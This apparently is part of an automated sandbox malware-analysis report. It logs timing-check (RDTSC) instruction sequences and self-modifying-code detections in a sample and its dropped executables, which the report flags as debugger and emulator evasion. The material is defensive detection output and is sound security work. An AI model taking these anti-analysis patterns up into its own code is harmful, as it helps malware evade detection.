Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 580090A second address: 5800946 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD2CC8277EFh 0x00000008 push esi 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007FD2CC8277F2h 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FD2CC8277EDh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5800946 second address: 580094A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 580094A second address: 5800950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5800950 second address: 58009A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD2CCE084FAh 0x00000009 adc ax, A398h 0x0000000e jmp 00007FD2CCE084FBh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FD2CCE08508h 0x0000001a xor esi, 7A99CDF8h 0x00000020 jmp 00007FD2CCE084FBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 xchg eax, ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d push edx 0x0000002e pop esi 0x0000002f mov ecx, edi 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 58009A6 second address: 58009AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 58009AC second address: 58009B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 58009B0 second address: 58009B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 58009B4 second address: 58009C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 58009C4 second address: 58009C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 58009C8 second address: 58009DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CCE084FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5800747 second address: 580074D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 580074D second address: 5800751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5800751 second address: 580077C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov bl, cl 0x0000000c popad 0x0000000d mov dword ptr [esp], ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD2CC8277F9h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 580077C second address: 5800782 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5800782 second address: 5800803 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FD2CC8277F4h 0x00000014 jmp 00007FD2CC8277F5h 0x00000019 popfd 0x0000001a push eax 0x0000001b mov bx, 0242h 0x0000001f pop edi 0x00000020 popad 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FD2CC8277EBh 0x0000002b sub cx, A93Eh 0x00000030 jmp 00007FD2CC8277F9h 0x00000035 popfd 0x00000036 mov di, cx 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57A021D second address: 57A0221 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57A0221 second address: 57A0227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57A0227 second address: 57A0281 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CCE08504h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD2CCE084FBh 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FD2CCE08504h 0x00000017 adc ecx, 7D108EB8h 0x0000001d jmp 00007FD2CCE084FBh 0x00000022 popfd 0x00000023 mov ax, 26EFh 0x00000027 popad 0x00000028 mov ebp, esp 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57A0281 second address: 57A0287 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5800C0F second address: 5800CB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD2CCE084FFh 0x00000009 add si, 5FBEh 0x0000000e jmp 00007FD2CCE08509h 0x00000013 popfd 0x00000014 jmp 00007FD2CCE08500h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FD2CCE084FEh 0x00000024 and ch, FFFFFFE8h 0x00000027 jmp 00007FD2CCE084FBh 0x0000002c popfd 0x0000002d pushfd 0x0000002e jmp 00007FD2CCE08508h 0x00000033 sub eax, 7610F248h 0x00000039 jmp 00007FD2CCE084FBh 0x0000003e popfd 0x0000003f popad 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FD2CCE08504h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5800CB7 second address: 5800CF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx eax, di 0x0000000e mov edx, 1AABD984h 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 jmp 00007FD2CC8277F3h 0x0000001b push dword ptr [ebp+0Ch] 0x0000001e pushad 0x0000001f mov cx, B977h 0x00000023 popad 0x00000024 push dword ptr [ebp+08h] 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5800CF8 second address: 5800CFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 5800CFE second address: 5800D41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 6938B679h 0x0000000e pushad 0x0000000f jmp 00007FD2CC8277F7h 0x00000014 mov ecx, 732CDD3Fh 0x00000019 popad 0x0000001a xor dword ptr [esp], 6939B67Bh 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 mov si, 000Dh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57B0539 second address: 57B0571 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CCE08501h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD2CCE084FEh 0x0000000f push eax 0x00000010 jmp 00007FD2CCE084FBh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 mov si, DFE1h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57B0571 second address: 57B0658 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov cx, AA19h 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d jmp 00007FD2CC8277F4h 0x00000012 push FFFFFFFEh 0x00000014 pushad 0x00000015 movzx esi, di 0x00000018 push ebx 0x00000019 mov si, 5BB5h 0x0000001d pop eax 0x0000001e popad 0x0000001f call 00007FD2CC8277E9h 0x00000024 jmp 00007FD2CC8277F1h 0x00000029 push eax 0x0000002a jmp 00007FD2CC8277F1h 0x0000002f mov eax, dword ptr [esp+04h] 0x00000033 jmp 00007FD2CC8277F1h 0x00000038 mov eax, dword ptr [eax] 0x0000003a jmp 00007FD2CC8277F1h 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 pushad 0x00000044 pushfd 0x00000045 jmp 00007FD2CC8277F7h 0x0000004a or cx, 705Eh 0x0000004f jmp 00007FD2CC8277F9h 0x00000054 popfd 0x00000055 mov ecx, 30734927h 0x0000005a popad 0x0000005b pop eax 0x0000005c jmp 00007FD2CC8277EAh 0x00000061 push 1EB598C5h 0x00000066 pushad 0x00000067 mov bx, CA6Eh 0x0000006b popad 0x0000006c add dword ptr [esp], 583A153Bh 0x00000073 push eax 0x00000074 push edx 0x00000075 pushad 0x00000076 push edi 0x00000077 pop eax 0x00000078 popad 0x00000079 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57B0658 second address: 57B068B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CCE08506h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000000h] 0x0000000f pushad 0x00000010 movzx eax, di 0x00000013 mov al, dl 0x00000015 popad 0x00000016 nop 0x00000017 pushad 0x00000018 mov esi, 1C43E5D7h 0x0000001d push eax 0x0000001e push edx 0x0000001f mov dx, ax 0x00000022 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57B068B second address: 57B06CA instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a mov si, 601Dh 0x0000000e popad 0x0000000f nop 0x00000010 pushad 0x00000011 mov bx, ax 0x00000014 call 00007FD2CC8277EEh 0x00000019 jmp 00007FD2CC8277F2h 0x0000001e pop eax 0x0000001f popad 0x00000020 sub esp, 1Ch 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57B06CA second address: 57B06CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57B06CE second address: 57B06D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57B06D4 second address: 57B0723 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD2CCE084FBh 0x00000009 sub al, FFFFFF9Eh 0x0000000c jmp 00007FD2CCE08509h 0x00000011 popfd 0x00000012 push ecx 0x00000013 pop ebx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebx 0x00000018 jmp 00007FD2CCE084FAh 0x0000001d push eax 0x0000001e jmp 00007FD2CCE084FBh 0x00000023 xchg eax, ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57B0723 second address: 57B0727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57B0727 second address: 57B072B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57B072B second address: 57B0731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57B0731 second address: 57B0771 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a mov cx, EBD3h 0x0000000e mov cx, 722Fh 0x00000012 popad 0x00000013 mov dword ptr [esp], esi 0x00000016 pushad 0x00000017 jmp 00007FD2CCE08500h 0x0000001c mov edi, ecx 0x0000001e popad 0x0000001f xchg eax, edi 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FD2CCE08503h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57B0771 second address: 57B0789 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2CC8277F4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57B0789 second address: 57B07E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a movzx eax, bx 0x0000000d pushad 0x0000000e call 00007FD2CCE084FFh 0x00000013 pop eax 0x00000014 push edx 0x00000015 pop ecx 0x00000016 popad 0x00000017 popad 0x00000018 xchg eax, edi 0x00000019 pushad 0x0000001a mov ax, dx 0x0000001d jmp 00007FD2CCE084FDh 0x00000022 popad 0x00000023 mov eax, dword ptr [76FAB370h] 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b pushfd 0x0000002c jmp 00007FD2CCE084FAh 0x00000031 add esi, 19C2EDA8h 0x00000037 jmp 00007FD2CCE084FBh 0x0000003c popfd 0x0000003d rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57B07E3 second address: 57B0854 instructions: 0x00000000 rdtsc 0x00000002 mov dl, al 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 call 00007FD2CC8277EBh 0x0000000c pop esi 0x0000000d mov ax, dx 0x00000010 popad 0x00000011 popad 0x00000012 xor dword ptr [ebp-08h], eax 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FD2CC8277F1h 0x0000001c sbb cl, 00000076h 0x0000001f jmp 00007FD2CC8277F1h 0x00000024 popfd 0x00000025 pushfd 0x00000026 jmp 00007FD2CC8277F0h 0x0000002b sbb esi, 6D7F5598h 0x00000031 jmp 00007FD2CC8277EBh 0x00000036 popfd 0x00000037 popad 0x00000038 xor eax, ebp 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d mov ah, F9h 0x0000003f mov eax, edi 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57B0854 second address: 57B086D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2CCE08505h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57B086D second address: 57B08BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d movzx eax, dx 0x00000010 mov edx, 32068F9Ch 0x00000015 popad 0x00000016 push eax 0x00000017 jmp 00007FD2CC8277F2h 0x0000001c nop 0x0000001d jmp 00007FD2CC8277F0h 0x00000022 lea eax, dword ptr [ebp-10h] 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57B08BC second address: 57B08C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57B08C0 second address: 57B08C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57B08C4 second address: 57B08CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57B0A35 second address: 57B0AA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FD2CC8277EBh 0x0000000b and si, C38Eh 0x00000010 jmp 00007FD2CC8277F9h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [ebp-20h], eax 0x0000001c jmp 00007FD2CC8277EEh 0x00000021 mov ebx, dword ptr [esi] 0x00000023 pushad 0x00000024 mov esi, 39F546DDh 0x00000029 jmp 00007FD2CC8277EAh 0x0000002e popad 0x0000002f mov dword ptr [ebp-24h], ebx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FD2CC8277F7h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57B0AA8 second address: 57B0AC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2CCE08504h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57B0133 second address: 57B0138 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 57B0138 second address: 57B016C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FD2CCE084FDh 0x0000000a xor eax, 4D560136h 0x00000010 jmp 00007FD2CCE08501h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push ebx 0x0000001e pop ecx 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 8D1AD0 second address: 8D1ADC instructions: 0x00000000 rdtsc 0x00000002 je 00007FD2CC8277E6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 8D1ADC second address: 8D1AE6 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD2CCE084FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 8C4F68 second address: 8C4F8F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD2CC8277E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FD2CC8277F8h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 8C4F8F second address: 8C4F95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 8C4F95 second address: 8C4F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 8D125B second address: 8D1275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jmp 00007FD2CCE08500h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 8D42AC second address: 8D42F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 nop 0x00000007 mov dx, CE06h 0x0000000b push 00000000h 0x0000000d mov dx, 2768h 0x00000011 call 00007FD2CC8277E9h 0x00000016 ja 00007FD2CC8277FAh 0x0000001c jmp 00007FD2CC8277F4h 0x00000021 push eax 0x00000022 pushad 0x00000023 jnp 00007FD2CC8277E8h 0x00000029 pushad 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d jo 00007FD2CC8277E6h 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 8D42F2 second address: 8D4315 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007FD2CCE08501h 0x00000010 mov eax, dword ptr [eax] 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 8D4315 second address: 8D4324 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 8D4324 second address: 8D436B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 jnc 00007FD2CCE084F6h 0x0000000c pop ecx 0x0000000d popad 0x0000000e pop eax 0x0000000f mov ch, ah 0x00000011 push 00000003h 0x00000013 jmp 00007FD2CCE084FCh 0x00000018 push 00000000h 0x0000001a mov dword ptr [ebp+122D2F3Ah], esi 0x00000020 push 00000003h 0x00000022 mov edx, dword ptr [ebp+122D2A8Ah] 0x00000028 push 8BE12D41h 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FD2CCE08501h 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 8D436B second address: 8D43A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 341ED2BFh 0x00000010 mov edi, dword ptr [ebp+122D2D4Ah] 0x00000016 lea ebx, dword ptr [ebp+1244916Dh] 0x0000001c mov cl, A7h 0x0000001e xchg eax, ebx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 ja 00007FD2CC8277E6h 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 8D43A7 second address: 8D43B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FD2CCE084F6h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 8D43B5 second address: 8D43C6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007FD2CC8277E6h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 8D4430 second address: 8D4435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Special instruction interceptor: First address: F3EDD5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Special instruction interceptor: First address: 10DAF64 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Special instruction interceptor: First address: 1100ED2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Special instruction interceptor: First address: F3EDDB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Special instruction interceptor: First address: 11643AB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 75EDD5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 8FAF64 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 920ED2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 75EDDB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 9843AB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Special instruction interceptor: First address: 57D93B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Special instruction interceptor: First address: 7284B3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Special instruction interceptor: First address: 7288BA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Special instruction interceptor: First address: 726E70 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Special instruction interceptor: First address: 57D8BD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Special instruction interceptor: First address: 7B2DE6 instructions caused by: Self-modifying code
